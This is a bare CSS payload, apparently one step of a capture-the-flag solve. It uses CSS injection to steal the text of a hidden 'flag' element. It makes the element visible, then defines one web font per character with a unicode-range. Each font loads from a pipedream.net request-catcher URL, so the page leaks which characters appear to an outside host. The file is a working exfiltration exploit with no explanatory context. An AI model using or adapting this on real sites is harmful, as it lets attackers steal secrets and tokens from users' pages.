body{background-image:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=W38')}
#page{content-visibility:hidden;animation:unveil 0.001s 0.3s forwards}
@keyframes unveil{to{content-visibility:visible}}
#flag{display:block!important}
#flag{font-family:p97w38,p98w38,p106w38,p112w38,p115w38,p121w38,p122w38,p48w38,p49w38,p52w38,p53w38,p55w38,p125w38,monospace;width:38ch;white-space:pre-wrap;word-break:break-all;overflow:visible}
#flag::first-line{font-family:monospace!important}
@font-face{font-family:p97w38;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=a_W38');unicode-range:U+0061}
@font-face{font-family:p98w38;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=b_W38');unicode-range:U+0062}
@font-face{font-family:p106w38;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=j_W38');unicode-range:U+006A}
@font-face{font-family:p112w38;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=p_W38');unicode-range:U+0070}
@font-face{font-family:p115w38;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=s_W38');unicode-range:U+0073}
@font-face{font-family:p121w38;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=y_W38');unicode-range:U+0079}
@font-face{font-family:p122w38;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=z_W38');unicode-range:U+007A}
@font-face{font-family:p48w38;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=0_W38');unicode-range:U+0030}
@font-face{font-family:p49w38;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=1_W38');unicode-range:U+0031}
@font-face{font-family:p52w38;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=4_W38');unicode-range:U+0034}
@font-face{font-family:p53w38;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=5_W38');unicode-range:U+0035}
@font-face{font-family:p55w38;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=7_W38');unicode-range:U+0037}
@font-face{font-family:p125w38;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=%7D_W38');unicode-range:U+007D}